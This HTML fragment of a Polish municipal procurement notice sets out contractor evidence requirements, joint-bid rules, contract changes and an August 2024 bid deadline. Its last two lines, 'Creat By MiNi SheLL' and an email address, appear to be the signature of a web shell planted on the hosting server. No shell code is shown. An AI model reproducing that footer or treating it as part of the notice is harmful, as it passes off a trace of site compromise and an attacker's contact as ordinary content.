lub są wykonywane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 5 do SWZ.<br/>2.2 Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; załącznik nr 7 do SWZ<br/><br/>3. Zgodnie z art. 274 ust. 1 lub 2 Ustawy Pzp, podmiotowe środki dowodowe składane są<br/>na wezwanie Zamawiającego, a nie wraz z ofertą.<br/>4. Podmiotowe środki dowodowe – na wezwanie Zamawiającego – składa się, pod<br/>rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>UWAGA!!!<br/>Powyższych dokumentów NIE NALEŻY składać wraz z ofertą. Dokumenty składa się<br/>na wezwanie Zamawiającego, a nie samodzielnie wraz z ofertą.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> . W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający, na podstawie art. 117 ust. 1 ustawy Pzp., określa, iż dokonując oceny<br/>spełniania warunku udziału w postępowaniu dotyczącego zdolności zawodowej uzna, że<br/>warunek został spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia wykaże samodzielne spełnianie tego<br/>warunku. Zamawiający tym samym nie dopuszcza łączenia (sumowania) doświadczenia<br/>zdobytego osobno przez każdego z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>6. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunku udziału<br/>w postępowaniu dotyczącego zdolności zawodowej polega, na zasadach określonych<br/>w art. 118 ustawy Pzp., na zdolnościach zawodowych innych podmiotów, Zamawiający<br/>określa, iż dokonując oceny spełniania warunku udziału w postępowaniu dotyczącego<br/>zdolności zawodowej uzna, że warunek został spełniony, jeżeli co najmniej jeden z tych<br/>podmiotów wykaże samodzielne spełnianie tego warunku. Zamawiający tym samym nie<br/>dopuszcza łączenia (sumowania) doświadczenia zdobytego osobno przez każdy<br/>z podmiotów, na których zdolnościach zawodowych polega Wykonawca.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Ustawy Pzp., jest spełniony, jeżeli<br/>co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te<br/>uprawnienia są wymagane.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.<br/>9. W przypadku, o którym mowa w ust. 7 i 8, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 4 do SWZ.<br/>10. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>11. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>12. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>13. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp., także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na<br/>jego zasoby.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 3b do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie Zamówienia publicznego,<br/>które zostaną wprowadzone do treści tej umowy<br/>Projektowane Postanowienia Umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawarte są w Załączniku nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/gminadrawsko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com